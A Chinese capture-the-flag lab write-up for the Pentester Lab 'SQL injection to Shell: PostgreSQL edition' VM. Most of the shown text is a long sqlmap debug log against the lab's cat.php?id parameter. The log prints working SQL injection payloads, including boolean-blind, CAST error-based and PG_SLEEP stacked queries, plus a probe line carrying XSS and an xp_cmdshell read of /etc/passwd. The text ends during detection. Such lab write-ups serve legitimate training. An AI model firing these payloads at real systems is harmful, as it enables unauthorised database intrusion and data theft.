CTF靶场系列-Pentester Lab: From SQL injection to Shell: PostgreSQL edition – 作者:陌度

下载地址

https://download.vulnhub.com/pentesterlab/from_sqli_to_shell_pg_edition_i386.iso

实战演练

使用netdiscover命令查找靶机的IP。

image.png

使用nmap查看靶机开放的端口

image.png打开浏览器

image.png直接用sqlmap就可以测试,下面是记录SQLMAP跑Postgresql的过程

root@kali:~# sqlmap -u "http://192.168.0.104/cat.php?id=1" --dbms=PostgreSQL -p  id -v 3  --batch --level 5 --risk 3 
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.3.4#stable}
|_ -| . [.]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 00:13:20 /2019-08-20/

[00:13:20] [DEBUG] cleaning up configuration parameters
[00:13:20] [DEBUG] setting the HTTP timeout
[00:13:20] [DEBUG] setting the HTTP User-Agent header
[00:13:20] [DEBUG] creating HTTP requests opener object
[00:13:20] [DEBUG] forcing back-end DBMS to user defined value
[00:13:20] [DEBUG] setting the HTTP Referer header to the target URL
[00:13:20] [DEBUG] setting the HTTP Host header to the target URL
[00:13:20] [INFO] testing connection to the target URL
[00:13:21] [INFO] heuristics detected web page charset 'ascii'
[00:13:21] [INFO] checking if the target is protected by some kind of WAF/IPS
[00:13:21] [PAYLOAD] 7276 AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#
[00:13:21] [INFO] testing if the target URL content is stable
[00:13:22] [INFO] target URL content is stable
[00:13:22] [PAYLOAD] 1(()(("(.)'
[00:13:22] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'PostgreSQL')
[00:13:22] [PAYLOAD] 1'eESWnV<'">ectfSz
[00:13:22] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[00:13:22] [INFO] testing for SQL injection on GET parameter 'id'
[00:13:22] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:13:22] [PAYLOAD] 1) AND 8098=8070-- wZWN
[00:13:22] [WARNING] reflective value(s) found and filtering out
[00:13:22] [PAYLOAD] 1) AND 1338=1338-- lSYD
[00:13:22] [PAYLOAD] 1) AND 5350=8599 AND (9067=9067
[00:13:22] [PAYLOAD] 1) AND 1338=1338 AND (8123=8123
[00:13:22] [PAYLOAD] 1)) AND 8005=1307 AND ((7970=7970
[00:13:22] [PAYLOAD] 1)) AND 1338=1338 AND ((3658=3658
[00:13:22] [PAYLOAD] 1))) AND 6537=4975 AND (((5830=5830
[00:13:22] [PAYLOAD] 1))) AND 1338=1338 AND (((8393=8393
[00:13:22] [PAYLOAD] 1 AND 3910=7600
[00:13:22] [DEBUG] setting match ratio for current parameter to 0.854
[00:13:22] [PAYLOAD] 1 AND 1338=1338
[00:13:22] [PAYLOAD] 1 AND 2641=9318
[00:13:22] [DEBUG] adjusting match ratio for current parameter to 0.909
[00:13:22] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Ruby")
[00:13:22] [DEBUG] skipping test 'OR boolean-based blind - WHERE or HAVING clause' because the payload for boolean-based blind has already been identified
[00:13:22] [DEBUG] skipping test 'OR boolean-based blind - WHERE or HAVING clause (NOT)' because the payload for boolean-based blind has already been identified
[00:13:22] [DEBUG] skipping test 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)' because the payload for boolean-based blind has already been identified
[00:13:22] [DEBUG] skipping test 'OR boolean-based blind - WHERE or HAVING clause (subquery - comment)' because the payload for boolean-based blind has already been identified
[00:13:22] [DEBUG] skipping test 'AND boolean-based blind - WHERE or HAVING clause (comment)' because the payload for boolean-based blind has already been identified
[00:13:22] [DEBUG] skipping test 'OR boolean-based blind - WHERE or HAVING clause (comment)' because the payload for boolean-based blind has already been identified
[00:13:22] [DEBUG] skipping test 'OR boolean-based blind - WHERE or HAVING clause (NOT - comment)' because the payload for boolean-based blind has already been identified
[00:13:22] [DEBUG] skipping test 'Boolean-based blind - Parameter replace (original value)' because the payload for boolean-based blind has already been identified
[00:13:22] [DEBUG] skipping test 'Boolean-based blind - Parameter replace (DUAL)' because the payload for boolean-based blind has already been identified
[00:13:22] [DEBUG] skipping test 'Boolean-based blind - Parameter replace (DUAL - original value)' because the payload for boolean-based blind has already been identified
[00:13:22] [DEBUG] skipping test 'Boolean-based blind - Parameter replace (CASE)' because the payload for boolean-based blind has already been identified
[00:13:22] [DEBUG] skipping test 'Boolean-based blind - Parameter replace (CASE - original value)' because the payload for boolean-based blind has already been identified
[00:13:22] [DEBUG] skipping test 'HAVING boolean-based blind - WHERE, GROUP BY clause' because the payload for boolean-based blind has already been identified
[00:13:22] [DEBUG] skipping test 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)' because the payload for boolean-based blind has already been identified
[00:13:22] [DEBUG] skipping test 'PostgreSQL OR boolean-based blind - WHERE or HAVING clause (CAST)' because the payload for boolean-based blind has already been identified
[00:13:22] [DEBUG] skipping test 'PostgreSQL boolean-based blind - Parameter replace' because the payload for boolean-based blind has already been identified
[00:13:22] [DEBUG] skipping test 'PostgreSQL boolean-based blind - Parameter replace (original value)' because the payload for boolean-based blind has already been identified
[00:13:22] [DEBUG] skipping test 'PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES)' because the payload for boolean-based blind has already been identified
[00:13:22] [DEBUG] skipping test 'PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES - original value)' because the payload for boolean-based blind has already been identified
[00:13:22] [DEBUG] skipping test 'PostgreSQL boolean-based blind - ORDER BY, GROUP BY clause' because the payload for boolean-based blind has already been identified
[00:13:22] [DEBUG] skipping test 'PostgreSQL boolean-based blind - ORDER BY clause (original value)' because the payload for boolean-based blind has already been identified
[00:13:22] [DEBUG] skipping test 'PostgreSQL boolean-based blind - ORDER BY clause (GENERATE_SERIES)' because the payload for boolean-based blind has already been identified
[00:13:22] [DEBUG] skipping test 'PostgreSQL boolean-based blind - Stacked queries' because the payload for boolean-based blind has already been identified
[00:13:22] [DEBUG] skipping test 'PostgreSQL boolean-based blind - Stacked queries (GENERATE_SERIES)' because the payload for boolean-based blind has already been identified
[00:13:22] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[00:13:22] [PAYLOAD] 1 AND 7925=CAST((CHR(113)||CHR(118)||CHR(122)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (7925=7925) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(120)||CHR(107)||CHR(120)||CHR(113)) AS NUMERIC)
[00:13:22] [INFO] GET parameter 'id' is 'PostgreSQL AND error-based - WHERE or HAVING clause' injectable 
[00:13:22] [DEBUG] skipping test 'PostgreSQL OR error-based - WHERE or HAVING clause' because the payload for error-based has already been identified
[00:13:22] [DEBUG] skipping test 'PostgreSQL error-based - Parameter replace' because the payload for error-based has already been identified
[00:13:22] [DEBUG] skipping test 'PostgreSQL error-based - Parameter replace (GENERATE_SERIES)' because the payload for error-based has already been identified
[00:13:22] [DEBUG] skipping test 'PostgreSQL error-based - ORDER BY, GROUP BY clause' because the payload for error-based has already been identified
[00:13:22] [DEBUG] skipping test 'PostgreSQL error-based - ORDER BY, GROUP BY clause (GENERATE_SERIES)' because the payload for error-based has already been identified
[00:13:22] [INFO] testing 'PostgreSQL inline queries'
[00:13:22] [PAYLOAD] (SELECT (CHR(113)||CHR(118)||CHR(122)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (7597=7597) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(120)||CHR(107)||CHR(120)||CHR(113)))
[00:13:22] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[00:13:22] [PAYLOAD] 1;SELECT PG_SLEEP(5)--
[00:13:22] [WARNING] time-based comparison requires larger statistical model, please wait............... (done)                                                                                                   
[00:13:27] [PAYLOAD] 1;SELECT PG_SLEEP(0)--
[00:13:27] [PAYLOAD] 1;SELECT PG_SLEEP(5)--
[00:13:32] [INFO] GET parameter 'id' appears to be 'PostgreSQL > 8.1 stacked queries (comment)' injectable 
[00:13:32] [DEBUG] skipping test 'PostgreSQL > 8.1 stacked queries' because the payload for stacked queries has already been identified
[00:13:32] [DEBUG] skipping test 'PostgreSQL stacked queries (heavy query - comment)' because the payload for stacked queries has already been identified
[00:13:32] [DEBUG] skipping test 'PostgreSQL stacked queries (heavy query)' because the payload for stacked queries has already been identified
[00:13:32] [DEBUG] skipping test 'PostgreSQL < 8.2 stacked queries (Glibc - comment)' because the payload for stacked queries has already been identified
[00:13:32] [DEBUG] skipping test 'PostgreSQL < 8.2 stacked queries (Glibc)' because the payload for stacked queries has already been identified
[00:13:32] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[00:13:32] [PAYLOAD] 1 AND 4944=(SELECT 4944 FROM PG_SLEEP(5))
[00:13:37] [PAYLOAD] 1 AND 4944=(SELECT 4944 FROM PG_SLEEP(0))
[00:13:37] [PAYLOAD] 1 AND 4944=(SELECT 4944 FROM PG_SLEEP(5))
[00:13:42] [INFO] GET parameter 'id' appears to be 'PostgreSQL > 8.1 AND time-based blind' injectable 
[00:13:42] [DEBUG] skipping test 'PostgreSQL > 8.1 OR time-based blind' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'PostgreSQL > 8.1 AND time-based blind (comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'PostgreSQL > 8.1 OR time-based blind (comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'PostgreSQL AND time-based blind (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'PostgreSQL OR time-based blind (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'PostgreSQL AND time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'PostgreSQL OR time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'PostgreSQL > 8.1 time-based blind - Parameter replace' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'PostgreSQL time-based blind - Parameter replace (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'PostgreSQL > 8.1 time-based blind - ORDER BY, GROUP BY clause' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'PostgreSQL time-based blind - ORDER BY, GROUP BY clause (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'OR boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle AND boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle OR boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL boolean-based blind - Parameter replace (MAKE_SET)' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL boolean-based blind - Parameter replace (ELT)' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL boolean-based blind - Parameter replace (ELT - original value)' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL boolean-based blind - Parameter replace (bool*int)' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL boolean-based blind - Parameter replace (bool*int - original value)' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Microsoft SQL Server/Sybase boolean-based blind - Parameter replace' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle boolean-based blind - Parameter replace' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle boolean-based blind - Parameter replace (original value)' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Informix boolean-based blind - Parameter replace' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Informix boolean-based blind - Parameter replace (original value)' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Microsoft Access boolean-based blind - Parameter replace' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Microsoft Access boolean-based blind - Parameter replace (original value)' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause (original value)' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle boolean-based blind - ORDER BY, GROUP BY clause' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle boolean-based blind - ORDER BY, GROUP BY clause (original value)' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Microsoft Access boolean-based blind - ORDER BY, GROUP BY clause' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Microsoft Access boolean-based blind - ORDER BY, GROUP BY clause (original value)' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'SAP MaxDB boolean-based blind - ORDER BY, GROUP BY clause' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'SAP MaxDB boolean-based blind - ORDER BY, GROUP BY clause (original value)' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.0 boolean-based blind - Stacked queries' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL < 5.0 boolean-based blind - Stacked queries' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Microsoft SQL Server/Sybase boolean-based blind - Stacked queries' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle boolean-based blind - Stacked queries' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Microsoft Access boolean-based blind - Stacked queries' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'SAP MaxDB boolean-based blind - Stacked queries' because the payload for boolean-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONVERT)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (CONVERT)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONCAT)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (CONCAT)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle OR error-based - WHERE or HAVING clause (XMLType)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle OR error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle OR error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle AND error-based - WHERE or HAVING clause (DBMS_UTILITY.SQLID_TO_SQLHASH)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle OR error-based - WHERE or HAVING clause (DBMS_UTILITY.SQLID_TO_SQLHASH)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'Firebird AND error-based - WHERE or HAVING clause' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'Firebird OR error-based - WHERE or HAVING clause' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.5 error-based - Parameter replace (EXP)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'Microsoft SQL Server/Sybase error-based - Parameter replace' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'Microsoft SQL Server/Sybase error-based - Parameter replace (integer column)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle error-based - Parameter replace' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'Firebird error-based - Parameter replace' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'Microsoft SQL Server/Sybase error-based - ORDER BY clause' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle error-based - ORDER BY, GROUP BY clause' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'Firebird error-based - ORDER BY clause' because the payload for error-based has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL inline queries' because its declared DBMS is different than provided
[00:13:42] [DEBUG] skipping test 'Microsoft SQL Server/Sybase inline queries' because its declared DBMS is different than provided
[00:13:42] [DEBUG] skipping test 'Oracle inline queries' because its declared DBMS is different than provided
[00:13:42] [DEBUG] skipping test 'SQLite inline queries' because its declared DBMS is different than provided
[00:13:42] [DEBUG] skipping test 'Firebird inline queries' because its declared DBMS is different than provided
[00:13:42] [DEBUG] skipping test 'MySQL > 5.0.11 stacked queries (comment)' because the payload for stacked queries has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL > 5.0.11 stacked queries' because the payload for stacked queries has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)' because the payload for stacked queries has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL > 5.0.11 stacked queries (query SLEEP)' because the payload for stacked queries has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL < 5.0.12 stacked queries (heavy query - comment)' because the payload for stacked queries has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL < 5.0.12 stacked queries (heavy query)' because the payload for stacked queries has already been identified
[00:13:42] [DEBUG] skipping test 'Microsoft SQL Server/Sybase stacked queries (comment)' because the payload for stacked queries has already been identified
[00:13:42] [DEBUG] skipping test 'Microsoft SQL Server/Sybase stacked queries' because the payload for stacked queries has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' because the payload for stacked queries has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE)' because the payload for stacked queries has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle stacked queries (heavy query - comment)' because the payload for stacked queries has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle stacked queries (heavy query)' because the payload for stacked queries has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle stacked queries (DBMS_LOCK.SLEEP - comment)' because the payload for stacked queries has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle stacked queries (DBMS_LOCK.SLEEP)' because the payload for stacked queries has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle stacked queries (USER_LOCK.SLEEP - comment)' because the payload for stacked queries has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle stacked queries (USER_LOCK.SLEEP)' because the payload for stacked queries has already been identified
[00:13:42] [DEBUG] skipping test 'IBM DB2 stacked queries (heavy query - comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'IBM DB2 stacked queries (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'SQLite > 2.0 stacked queries (heavy query - comment)' because the payload for stacked queries has already been identified
[00:13:42] [DEBUG] skipping test 'SQLite > 2.0 stacked queries (heavy query)' because the payload for stacked queries has already been identified
[00:13:42] [DEBUG] skipping test 'Firebird stacked queries (heavy query - comment)' because the payload for stacked queries has already been identified
[00:13:42] [DEBUG] skipping test 'Firebird stacked queries (heavy query)' because the payload for stacked queries has already been identified
[00:13:42] [DEBUG] skipping test 'SAP MaxDB stacked queries (heavy query - comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'SAP MaxDB stacked queries (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'HSQLDB >= 1.7.2 stacked queries (heavy query - comment)' because the payload for stacked queries has already been identified
[00:13:42] [DEBUG] skipping test 'HSQLDB >= 1.7.2 stacked queries (heavy query)' because the payload for stacked queries has already been identified
[00:13:42] [DEBUG] skipping test 'HSQLDB >= 2.0 stacked queries (heavy query - comment)' because the payload for stacked queries has already been identified
[00:13:42] [DEBUG] skipping test 'HSQLDB >= 2.0 stacked queries (heavy query)' because the payload for stacked queries has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.0.12 AND time-based blind' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.0.12 OR time-based blind' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.0.12 AND time-based blind (comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.0.12 OR time-based blind (comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL <= 5.0.11 AND time-based blind (heavy query)' because the payload for time-based blind has already been identified
